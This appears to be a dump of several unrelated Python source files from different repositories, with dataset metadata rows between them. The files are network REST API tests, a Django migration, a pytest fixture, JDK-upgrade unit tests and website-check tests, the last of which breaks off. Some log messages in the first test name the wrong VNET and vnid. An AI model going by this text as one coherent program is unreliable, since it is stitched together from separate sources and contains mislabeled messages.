pytest_assert(r.status_code == 204)
# Verify routes
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-3', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = [{"nexthop": "100.3.152.52", "ip_prefix": "192.168.20.4/32", "vnid": 7036002},
{"nexthop": "100.3.152.52", "ip_prefix": "101.0.20.5/32", "mac_address": "1c:34:da:72:b0:8a", "vnid": 7036002},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.20.4/32", "vnid": 7036002},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.30.0/24", "vnid": 7036002}]
for route in expected:
pytest_assert(route in r.json())
logger.info("Routes with vnid: 3000 to VNET vnet-guid-3 have been added successfully")
# Add routes
params = '[{"cmd": "add", "ip_prefix": "100.0.50.4/24", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": null}, \
{"cmd": "add", "ip_prefix": "100.0.70.0/16", "nexthop": "100.3.152.52", "vnid": 7036002, "mac_address": null}]'
logger.info("Adding routes with incorrect CIDR addresses with vnid: 7036002 to VNET vnet-guid-3")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-3', params)
pytest_assert(r.status_code == 207)
# Verify routes have not been added
# Add some delay before query
time.sleep(5)
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-3', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = [{"nexthop": "100.3.152.52", "ip_prefix": "100.0.50.4/24", "vnid": 7036002},
{"nexthop": "100.3.152.52", "ip_prefix": "100.0.70.0/16", "vnid": 7036002}]
for route in expected:
pytest_assert(route not in r.json())
logger.info("Routes with incorrect CIDR addresses with vnid: 7036002 to VNET vnet-guid-3 have not been added successfully")
'''
This test creates a VNET. It adds routes to the VNET and deletes them
'''
def test_create_vrf(construct_url):
# Create VNET
params = '{"vnid": 7039114}'
logger.info("Creating VNET vnet-guid-10 with vnid: 7039114")
r = restapi.post_config_vrouter_vrf_id(construct_url, 'vnet-guid-10', params)
pytest_assert(r.status_code == 204)
# Verify VNET has been created
r = restapi.get_config_vrouter_vrf_id(construct_url, 'vnet-guid-10')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"vnid": 7039114}, "vnet_id": "vnet-guid-10"}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VNET with vnet_id: vnet-guid-10 has been successfully created with vnid: 7039114")
# Add routes
params = '[{"cmd": "add", "ip_prefix": "10.1.0.1/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "add", "ip_prefix": "10.1.0.2/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "add", "ip_prefix": "10.1.0.3/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "add", "ip_prefix": "10.1.0.4/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "add", "ip_prefix": "10.1.0.5/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}]'
logger.info("Adding routes with vnid: 7039114 to VNET vnet-guid-10")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-10', params)
pytest_assert(r.status_code == 204)
# Verify routes
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-10', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = [{"nexthop": "100.78.60.37", "ip_prefix": "10.1.0.1/32", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"},
{"nexthop": "100.78.60.37", "ip_prefix": "10.1.0.2/32", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"},
{"nexthop": "100.78.60.37", "ip_prefix": "10.1.0.3/32", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"},
{"nexthop": "100.78.60.37", "ip_prefix": "10.1.0.4/32", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"},
{"nexthop": "100.78.60.37", "ip_prefix": "10.1.0.5/32", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}]
for route in expected:
pytest_assert(route in r.json())
logger.info("Routes with vnid: 7039114 to VNET vnet-guid-10 have been added successfully")
# Delete routes
params = '[{"cmd": "delete", "ip_prefix": "10.1.0.1/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "delete", "ip_prefix": "10.1.0.2/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "delete", "ip_prefix": "10.1.0.3/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "delete", "ip_prefix": "10.1.0.4/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}, \
{"cmd": "delete", "ip_prefix": "10.1.0.5/32", "nexthop": "100.78.60.37", "vnid": 7039114, "mac_address": "00:0d:3a:f9:1a:20"}]'
logger.info("Deleting routes with vnid: 7039114 from VNET vnet-guid-10")
r = restapi.patch_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-10', params)
pytest_assert(r.status_code == 204)
# Verify routes
params = '{}'
r = restapi.get_config_vrouter_vrf_id_routes(construct_url, 'vnet-guid-10', params)
pytest_assert(r.status_code == 200)
logger.info(r.json())
pytest_assert(len(r.json()) == 0)
logger.info("Routes with vnid: 7039114 from VNET vnet-guid-10 have been deleted successfully")
'''
This test creates a VNET and adds a VLAN, VLAN member and VLAN neighbor to it, then deletes them all
'''
def test_create_interface(construct_url, vlan_members):
# Create VNET
params = '{"vnid": 7039115}'
logger.info("Creating VNET vnet-guid-3 with vnid: 7039115")
r = restapi.post_config_vrouter_vrf_id(construct_url, 'vnet-guid-4', params)
pytest_assert(r.status_code == 204)
# Verify VNET has been created
r = restapi.get_config_vrouter_vrf_id(construct_url, 'vnet-guid-4')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"vnid": 7039115}, "vnet_id": "vnet-guid-4"}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VNET with vnet_id: vnet-guid-4 has been successfully created with vnid: 7039115")
# Create VLAN
params = '{"vnet_id": "vnet-guid-4", "ip_prefix": "40.0.0.1/24"}'
logger.info("Creating VLAN 4000 with ip_prefix: 40.0.0.1/24 under vnet_id: vnet-guid-4")
r = restapi.post_config_vlan(construct_url, '4000', params)
pytest_assert(r.status_code == 204)
# Verify VLAN has been created
r = restapi.get_config_vlan(construct_url, '4000')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"attr": {"ip_prefix": "40.0.0.1/24", "vnet_id": "vnet-guid-4"}, "vlan_id": 4000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("VLAN 4000 with ip_prefix: 40.0.0.1/24 under vnet_id: vnet-guid-4 has been successfully created")
vlan_intf = vlan_members[0]
logger.info("VLAN Interface: "+vlan_intf)
# Add and configure VLAN member
params = '{"tagging_mode": "tagged"}'
logger.info("Adding "+vlan_intf+" with tagging_mode: tagged to VLAN 4000")
r = restapi.post_config_vlan_member(construct_url, '4000', vlan_intf, params)
pytest_assert(r.status_code == 204)
# Verify VLAN member has been added
r = restapi.get_config_vlan_member(construct_url, '4000', vlan_intf)
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"if_name": "'+vlan_intf+'", "vlan_id": 4000, "attr": {"tagging_mode": "tagged"}}'
pytest_assert(r.json() == json.loads(expected))
logger.info(vlan_intf+" with tagging_mode: tagged has been successfully added to VLAN 4000")
# Add neighbor
params = '{}'
logger.info("Adding neighbor 40.0.0.4 to VLAN 4000")
r = restapi.post_config_vlan_neighbor(construct_url, '4000', '40.0.0.4', params)
pytest_assert(r.status_code == 204)
# Verify neighbor has been added
r = restapi.get_config_vlan_neighbor(construct_url, '4000', '40.0.0.4')
pytest_assert(r.status_code == 200)
logger.info(r.json())
expected = '{"ip_addr": "40.0.0.4", "vlan_id": 4000}'
pytest_assert(r.json() == json.loads(expected))
logger.info("Neighbor 40.0.0.4 has been successfully added to VLAN 4000")
# Delete Neighbor
params = '{}'
logger.info("Deleting neighbor 40.0.0.4 from VLAN 4000")
r = restapi.delete_config_vlan_neighbor(construct_url, '4000', '40.0.0.4', params)
pytest_assert(r.status_code == 204)
# Verify neighbor has been deleted
r = restapi.get_config_vlan_neighbor(construct_url, '4000', '40.0.0.4')
pytest_assert(r.status_code == 404)
logger.info(r.json())
logger.info("Neighbor 40.0.0.4 has been successfully deleted to VLAN 4000")
# Delete VLAN member
params = '{}'
logger.info("Deleting "+vlan_intf+" with tagging_mode: tagged to VLAN 4000")
r = restapi.delete_config_vlan_member(construct_url, '4000', vlan_intf, params)
pytest_assert(r.status_code == 204)
# Verify VLAN member has been deleted
r = restapi.get_config_vlan_member(construct_url, '4000', vlan_intf)
pytest_assert(r.status_code == 404)
logger.info(r.json())
logger.info(vlan_intf+" with tagging_mode: tagged has been successfully deleted to VLAN 4000")
# Delete VLAN
params = '{}'
logger.info("Deleting VLAN 4000")
r = restapi.delete_config_vlan(construct_url, '4000', params)
pytest_assert(r.status_code == 204)
# Verify VLAN has been deleted
r = restapi.get_config_vlan(construct_url, '4000')
pytest_assert(r.status_code == 404)
logger.info(r.json())
logger.info("VLAN 4000 has been successfully deleted")
# Delete VNET
params = '{}'
logger.info("Deleting VNET vnet-guid-3")
r = restapi.delete_config_vrouter_vrf_id(construct_url, 'vnet-guid-4', params)
pytest_assert(r.status_code == 204)
# Verify VNET has been deleted
r = restapi.get_config_vrouter_vrf_id(construct_url, 'vnet-guid-4')
pytest_assert(r.status_code == 404)
logger.info(r.json())
logger.info("VNET with vnet_id: vnet-guid-4 has been successfully deleted")
| 49.330166 | 144 | 0.656202 | 3,175 | 20,768 | 4.131024 | 0.053858 | 0.05642 | 0.059469 | 0.068085 | 0.920936 | 0.900046 | 0.878469 | 0.834858 | 0.815493 | 0.785529 | 0 | 0.116051 | 0.17474 | 20,768 | 420 | 145 | 49.447619 | 0.649221 | 0.061874 | 0 | 0.467577 | 0 | 0.122867 | 0.375707 | 0 | 0 | 0 | 0 | 0 | 0.228669 | 1 | 0.010239 | false | 0 | 0.023891 | 0 | 0.03413 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
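The test above repeats the same POST-then-GET-and-compare pattern for every resource. A minimal sketch of a helper that would factor this out; restapi, construct_url, logger, and pytest_assert are the harness names used in the test, while create_and_verify, post_fn, get_fn, and key are hypothetical names introduced here:

import json

def create_and_verify(post_fn, get_fn, construct_url, key, params, expected_json):
    # Hypothetical helper: POST the config, then GET it back and compare payloads.
    r = post_fn(construct_url, key, params)
    pytest_assert(r.status_code == 204)
    r = get_fn(construct_url, key)
    pytest_assert(r.status_code == 200)
    pytest_assert(r.json() == json.loads(expected_json))
    logger.info("Resource %s created and verified", key)

For example, the VLAN step would become create_and_verify(restapi.post_config_vlan, restapi.get_config_vlan, construct_url, '4000', params, expected).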
fe01e92159651c17418a2aa99ab1f27fc4952fa7 | 1,241 | py | Python | protein/migrations/0008_auto_20200422_1636.py | pszgaspar/protwis | 4989a67175ef3c95047d795c843cf6b9cf4141fa | [
"Apache-2.0"
] | 21 | 2016-01-20T09:33:14.000Z | 2021-12-20T19:19:45.000Z | protein/migrations/0008_auto_20200422_1636.py | pszgaspar/protwis | 4989a67175ef3c95047d795c843cf6b9cf4141fa | [
"Apache-2.0"
] | 75 | 2016-02-26T16:29:58.000Z | 2022-03-21T12:35:13.000Z | protein/migrations/0008_auto_20200422_1636.py | AlibekMamyrbekov/protwis | b3d477b1982623618d995ab5c7f47c918a70238b | [
"Apache-2.0"
] | 77 | 2016-01-22T08:44:26.000Z | 2022-02-01T15:54:56.000Z | # Generated by Django 3.0.4 on 2020-04-22 14:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('protein', '0007_proteingproteinpair_references'),
]
operations = [
migrations.AddField(
model_name='proteingproteinpair',
name='emax_dnorm',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='emax_mean',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='emax_sem',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='log_ec50_dnorm',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='log_ec50_mean',
field=models.FloatField(null=True),
),
migrations.AddField(
model_name='proteingproteinpair',
name='log_ec50_sem',
field=models.FloatField(null=True),
),
]
| 28.204545 | 59 | 0.572925 | 109 | 1,241 | 6.366972 | 0.348624 | 0.15562 | 0.198847 | 0.233429 | 0.76513 | 0.76513 | 0.714697 | 0.636888 | 0.636888 | 0.636888 | 0 | 0.029586 | 0.319098 | 1,241 | 43 | 60 | 28.860465 | 0.791716 | 0.036261 | 0 | 0.648649 | 1 | 0 | 0.18593 | 0.029313 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
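The migration above adds six nullable FloatFields, so rows that predate it carry NULL in the new columns. A usage sketch, assuming the model class is ProteinGProteinPair in protein/models.py (inferred from model_name='proteingproteinpair', not confirmed by the source):

from protein.models import ProteinGProteinPair  # assumed import path

# Rows created before this migration hold NULL in the new columns,
# so exclude them before working with emax_mean.
pairs = ProteinGProteinPair.objects.filter(emax_mean__isnull=False)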
fe09b2ced11f57d37b945455ce0cb7da292bace6 | 157 | py | Python | db/tests/fixtures/user_request.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 1 | 2022-03-03T09:55:57.000Z | 2022-03-03T09:55:57.000Z | db/tests/fixtures/user_request.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | 7 | 2022-02-09T10:44:53.000Z | 2022-03-28T03:29:43.000Z | db/tests/fixtures/user_request.py | matchd-ch/matchd-backend | 84be4aab1b4708cae50a8988301b15df877c8db0 | [
"Apache-2.0"
] | null | null | null | import pytest
@pytest.fixture
def user_request_valid_args():
return {'name': 'Send Money', 'email': 'princeofworld@email.com', 'message': 'sendmoney'}
| 22.428571 | 93 | 0.713376 | 19 | 157 | 5.736842 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121019 | 157 | 6 | 94 | 26.166667 | 0.789855 | 0 | 0 | 0 | 0 | 0 | 0.369427 | 0.146497 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
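A usage sketch for the fixture above; the test name is hypothetical, and pytest injects the fixture by matching the argument name:

def test_user_request_valid_args_shape(user_request_valid_args):
    # pytest resolves the argument by fixture name and injects the returned dict.
    assert set(user_request_valid_args) == {"name", "email", "message"}
    assert user_request_valid_args["name"] == "Send Money"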
fe0c3ca1f7f701af714988922f506e4a6011042f | 8,472 | py | Python | tests/integrations/java/test_JDK_upgrade.py | junefish/python-briefcase | 93f5c22304b3914b3c20b82e01d0a5914119faef | [
"BSD-3-Clause"
] | 917 | 2019-03-30T15:45:39.000Z | 2022-03-31T05:32:02.000Z | tests/integrations/java/test_JDK_upgrade.py | junefish/python-briefcase | 93f5c22304b3914b3c20b82e01d0a5914119faef | [
"BSD-3-Clause"
] | 429 | 2019-04-07T19:03:20.000Z | 2022-03-31T23:47:42.000Z | tests/integrations/java/test_JDK_upgrade.py | junefish/python-briefcase | 93f5c22304b3914b3c20b82e01d0a5914119faef | [
"BSD-3-Clause"
] | 166 | 2019-04-02T01:56:55.000Z | 2022-03-28T19:10:02.000Z | import os
import shutil
import sys
from unittest.mock import MagicMock
import pytest
from requests import exceptions as requests_exceptions
from briefcase.exceptions import (
BriefcaseCommandError,
MissingToolError,
NetworkFailure,
NonManagedToolError
)
from briefcase.integrations.java import JDK
from tests.utils import FsPathMock
@pytest.fixture
def test_command(tmp_path):
command = MagicMock()
command.host_os = 'Linux'
command.tools_path = tmp_path / 'tools'
return command
def test_non_managed_install(test_command, tmp_path, capsys):
"If the Java install points to a non-managed install, no upgrade is attempted"
# Make the installation point to somewhere else.
jdk = JDK(test_command, java_home=tmp_path / 'other-jdk')
# Attempt an upgrade. This will fail because the install is non-managed
with pytest.raises(NonManagedToolError):
jdk.upgrade()
# No download was attempted
assert test_command.download_url.call_count == 0
def test_non_existing_install(test_command, tmp_path):
"If there's no existing managed JDK install, upgrading is an error"
# Create an SDK wrapper around a non-existing managed install
jdk = JDK(test_command, java_home=tmp_path / 'tools' / 'java')
with pytest.raises(MissingToolError):
jdk.upgrade()
# No download was attempted
assert test_command.download_url.call_count == 0
def test_existing_install(test_command, tmp_path):
"If there's an existing managed JDK install, it is deleted and redownloaded"
# Create a mock of a previously installed Java version.
java_home = tmp_path / 'tools' / 'java'
(java_home / 'bin').mkdir(parents=True)
# We actually need to delete the original java install
def rmtree(path):
shutil.rmtree(path)
test_command.shutil.rmtree.side_effect = rmtree
# Mock the cached download path.
# Consider removing this if block once we drop Python 3.7 support and keep only the else branch:
# MagicMock below Python 3.8 doesn't have the __fspath__ attribute.
if sys.version_info < (3, 8):
archive = FsPathMock("/path/to/download.zip")
else:
archive = MagicMock()
archive.__fspath__.return_value = "/path/to/download.zip"
test_command.download_url.return_value = archive
# Create a directory to make it look like Java was downloaded and unpacked.
(tmp_path / 'tools' / 'jdk8u242-b08').mkdir(parents=True)
# Create an SDK wrapper
jdk = JDK(test_command, java_home=java_home)
# Attempt an upgrade.
jdk.upgrade()
# The old version has been deleted
test_command.shutil.rmtree.assert_called_with(java_home)
# A download was initiated
test_command.download_url.assert_called_with(
url="https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/"
"jdk8u242-b08/OpenJDK8U-jdk_x64_linux_hotspot_8u242b08.tar.gz",
download_path=tmp_path / 'tools',
)
# The archive was unpacked.
# TODO: Py3.6 compatibility; os.fsdecode not required in Py3.7
test_command.shutil.unpack_archive.assert_called_with(
"/path/to/download.zip",
extract_dir=os.fsdecode(tmp_path / "tools")
)
# The original archive was deleted
archive.unlink.assert_called_once_with()
def test_macOS_existing_install(test_command, tmp_path):
"If there's an existing managed macOS JDK install, it is deleted and redownloaded"
# Force mocking on macOS
test_command.host_os = 'Darwin'
# Create a mock of a previously installed Java version.
java_home = tmp_path / 'tools' / 'java' / 'Contents' / 'Home'
(java_home / 'bin').mkdir(parents=True)
# We actually need to delete the original java install
def rmtree(path):
shutil.rmtree(path)
test_command.shutil.rmtree.side_effect = rmtree
# Mock the cached download path.
# Consider removing this if block once we drop Python 3.7 support and keep only the else branch:
# MagicMock below Python 3.8 doesn't have the __fspath__ attribute.
if sys.version_info < (3, 8):
archive = FsPathMock("/path/to/download.zip")
else:
archive = MagicMock()
archive.__fspath__.return_value = "/path/to/download.zip"
test_command.download_url.return_value = archive
# Create a directory to make it look like Java was downloaded and unpacked.
(tmp_path / 'tools' / 'jdk8u242-b08').mkdir(parents=True)
# Create an SDK wrapper
jdk = JDK(test_command, java_home=java_home)
# Attempt an upgrade.
jdk.upgrade()
# The old version has been deleted
test_command.shutil.rmtree.assert_called_with(tmp_path / 'tools' / 'java')
# A download was initiated
test_command.download_url.assert_called_with(
url="https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/"
"jdk8u242-b08/OpenJDK8U-jdk_x64_mac_hotspot_8u242b08.tar.gz",
download_path=tmp_path / 'tools',
)
# The archive was unpacked.
# TODO: Py3.6 compatibility; os.fsdecode not required in Py3.7
test_command.shutil.unpack_archive.assert_called_with(
"/path/to/download.zip",
extract_dir=os.fsdecode(tmp_path / "tools")
)
# The original archive was deleted
archive.unlink.assert_called_once_with()
def test_download_fail(test_command, tmp_path):
"If there's an existing managed JDK install, it is deleted and redownloaded"
# Create a mock of a previously installed Java version.
java_home = tmp_path / 'tools' / 'java'
(java_home / 'bin').mkdir(parents=True)
# We actually need to delete the original java install
def rmtree(path):
shutil.rmtree(path)
test_command.shutil.rmtree.side_effect = rmtree
# Mock a failure on download
test_command.download_url.side_effect = requests_exceptions.ConnectionError
# Create an SDK wrapper
jdk = JDK(test_command, java_home=java_home)
# Attempt an upgrade. This will fail along with the download
with pytest.raises(NetworkFailure):
jdk.upgrade()
# The old version has been deleted
test_command.shutil.rmtree.assert_called_with(java_home)
# A download was initiated
test_command.download_url.assert_called_with(
url="https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/"
"jdk8u242-b08/OpenJDK8U-jdk_x64_linux_hotspot_8u242b08.tar.gz",
download_path=tmp_path / 'tools',
)
# No attempt was made to unpack the archive
assert test_command.shutil.unpack_archive.call_count == 0
def test_unpack_fail(test_command, tmp_path):
"If there's an existing managed JDK install, it is deleted and redownloaded"
# Create a mock of a previously installed Java version.
java_home = tmp_path / 'tools' / 'java'
(java_home / 'bin').mkdir(parents=True)
# We actually need to delete the original java install
def rmtree(path):
shutil.rmtree(path)
test_command.shutil.rmtree.side_effect = rmtree
# Mock the cached download path
# Consider removing this if block once we drop Python 3.7 support and keep only the else branch:
# MagicMock below Python 3.8 doesn't have the __fspath__ attribute.
if sys.version_info < (3, 8):
archive = FsPathMock("/path/to/download.zip")
else:
archive = MagicMock()
archive.__fspath__.return_value = "/path/to/download.zip"
test_command.download_url.return_value = archive
# Mock an unpack failure due to an invalid archive
test_command.shutil.unpack_archive.side_effect = shutil.ReadError
# Create an SDK wrapper
jdk = JDK(test_command, java_home=java_home)
# Attempt an upgrade. This will fail.
with pytest.raises(BriefcaseCommandError):
jdk.upgrade()
# The old version has been deleted
test_command.shutil.rmtree.assert_called_with(java_home)
# A download was initiated
test_command.download_url.assert_called_with(
url="https://github.com/AdoptOpenJDK/openjdk8-binaries/releases/download/"
"jdk8u242-b08/OpenJDK8U-jdk_x64_linux_hotspot_8u242b08.tar.gz",
download_path=tmp_path / 'tools',
)
# The archive was unpacked.
# TODO: Py3.6 compatibility; os.fsdecode not required in Py3.7
test_command.shutil.unpack_archive.assert_called_with(
"/path/to/download.zip",
extract_dir=os.fsdecode(tmp_path / "tools")
)
# The original archive was not deleted
assert archive.unlink.call_count == 0
| 35.008264 | 93 | 0.712937 | 1,154 | 8,472 | 5.051127 | 0.14818 | 0.069823 | 0.032939 | 0.037742 | 0.805627 | 0.788128 | 0.781781 | 0.775605 | 0.764625 | 0.757591 | 0 | 0.016258 | 0.201369 | 8,472 | 241 | 94 | 35.153527 | 0.845256 | 0.323182 | 0 | 0.62406 | 0 | 0 | 0.214356 | 0.069657 | 0 | 0 | 0 | 0.004149 | 0.12782 | 1 | 0.082707 | false | 0 | 0.067669 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
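The version-guarded archive mock is repeated three times in the tests above. A small factory sketch that could replace those copies; make_archive_mock is a hypothetical name, and FsPathMock comes from tests.utils as imported in the module:

import sys
from unittest.mock import MagicMock

from tests.utils import FsPathMock

def make_archive_mock(path="/path/to/download.zip"):
    # MagicMock only supports __fspath__ from Python 3.8 onwards,
    # so fall back to the project's FsPathMock helper on 3.7.
    if sys.version_info < (3, 8):
        return FsPathMock(path)
    archive = MagicMock()
    archive.__fspath__.return_value = path
    return archive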
a3c40eb7a39ecb3f63e62b546016b5e02696384a | 8,765 | py | Python | airflow/tests/test_check_website_operations.py | rafaelpezzuto/opac-airflow | 7e73eaacdace5ca9d3dbcf2c5f84019568282485 | [
"BSD-2-Clause"
] | null | null | null | airflow/tests/test_check_website_operations.py | rafaelpezzuto/opac-airflow | 7e73eaacdace5ca9d3dbcf2c5f84019568282485 | [
"BSD-2-Clause"
] | null | null | null | airflow/tests/test_check_website_operations.py | rafaelpezzuto/opac-airflow | 7e73eaacdace5ca9d3dbcf2c5f84019568282485 | [
"BSD-2-Clause"
] | null | null | null | from unittest import TestCase
from unittest.mock import patch, call
from airflow import DAG
from operations.check_website_operations import (
concat_website_url_and_uri_list_items,
check_uri_list,
check_website_uri_list,
)
class TestConcatWebsiteUrlAndUriListItems(TestCase):
def test_concat_website_url_and_uri_list_items_for_none_website_url_and_none_uri_list_returns_empty_list(self):
items = concat_website_url_and_uri_list_items(None, None)
self.assertEqual([], items)
def test_concat_website_url_and_uri_list_items_for_none_website_url_returns_empty_list(self):
items = concat_website_url_and_uri_list_items(None, ['uri'])
self.assertEqual([], items)
def test_concat_website_url_and_uri_list_items_for_none_uri_list_returns_empty_list(self):
items = concat_website_url_and_uri_list_items(['website'], None)
self.assertEqual([], items)
def test_concat_website_url_and_uri_list_items_returns_list(self):
items = concat_website_url_and_uri_list_items(
['website1', 'website2'],
['/uri1', '/uri2'])
self.assertEqual(
['website1/uri1',
'website1/uri2',
'website2/uri1',
'website2/uri2', ],
items)
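# Minimal stand-in for requests.Response that exposes only status_code.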
class MockResponse:
def __init__(self, code):
self.status_code = code
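# Test double that records info and debug messages in lists for later inspection.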
class MockLogger:
def __init__(self):
self._info = []
self._debug = []
def info(self, msg):
self._info.append(msg)
def debug(self, msg):
self._debug.append(msg)
class TestCheckUriList(TestCase):
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_200_returns_empty_list(self, mock_req_head):
mock_req_head.side_effect = [MockResponse(200), MockResponse(200), ]
uri_list = ["goodURI1", "goodURI2", ]
result = check_uri_list(uri_list)
self.assertEqual([], result)
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_301_returns_empty_list(self, mock_req_head):
mock_req_head.side_effect = [MockResponse(301)]
uri_list = ["URI"]
result = check_uri_list(uri_list)
self.assertEqual([], result)
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_302_returns_empty_list(self, mock_req_head):
mock_req_head.side_effect = [MockResponse(302)]
uri_list = ["URI"]
result = check_uri_list(uri_list)
self.assertEqual([], result)
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_404_returns_failure_list(self, mock_req_head):
mock_req_head.side_effect = [MockResponse(404)]
uri_list = ["BAD_URI"]
result = check_uri_list(uri_list)
self.assertEqual(
uri_list,
result)
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_429_returns_failure_list(self, mock_req_head):
mock_req_head.side_effect = [MockResponse(429), MockResponse(404)]
uri_list = ["BAD_URI"]
result = check_uri_list(uri_list)
self.assertEqual(
uri_list,
result)
@patch('operations.check_website_operations.retry_after')
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_200_after_retries_returns_empty_list(self, mock_req_head, mock_retry_after):
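# Patch retry_after to yield short delays so the test does not sleep for real between retries.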
mock_retry_after.return_value = [
0.1, 0.2, 0.4, 0.8, 1,
]
mock_req_head.side_effect = [
MockResponse(429),
MockResponse(502),
MockResponse(503),
MockResponse(504),
MockResponse(500),
MockResponse(200),
]
uri_list = ["GOOD_URI"]
result = check_uri_list(uri_list)
self.assertEqual([], result)
@patch('operations.check_website_operations.retry_after')
@patch('operations.check_website_operations.requests.head')
def test_check_uri_list_for_status_code_404_after_retries_returns_failure_list(self, mock_req_head, mock_retry_after):
mock_retry_after.return_value = [
0.1, 0.2, 0.4, 0.8, 1,
]
mock_req_head.side_effect = [
MockResponse(429),
MockResponse(502),
MockResponse(404),
]
uri_list = ["BAD_URI"]
result = check_uri_list(uri_list)
self.assertEqual(["BAD_URI"], result)
class TestCheckWebsiteUriList(TestCase):
def test_check_website_uri_list_raises_value_error_because_website_urls_are_missing(self):
with self.assertRaises(ValueError):
check_website_uri_list('/path/uri_list_file_path.lst', [])
@patch("operations.check_website_operations.Logger.info")
@patch("operations.check_website_operations.read_file")
def test_check_website_uri_list_informs_zero_uri(self, mock_read_file, mock_info):
mock_read_file.return_value = []
uri_list_file_path = "/tmp/uri_list_2010-10-09.lst"
website_url_list = ["http://www.scielo.br", "https://newscielo.br"]
check_website_uri_list(uri_list_file_path, website_url_list)
self.assertEqual(
mock_info.call_args_list,
[
call('Quantidade de URI: %i', 0),
call("Encontrados: %i/%i", 0, 0),
]
)
@patch("operations.check_website_operations.Logger.info")
@patch("operations.check_website_operations.requests.head")
@patch("operations.check_website_operations.read_file")
def test_check_website_uri_list_informs_that_all_were_found(self, mock_read_file, mock_head, mock_info):
mock_read_file.return_value = (
"/scielo.php?script=sci_serial&pid=0001-3765\n"
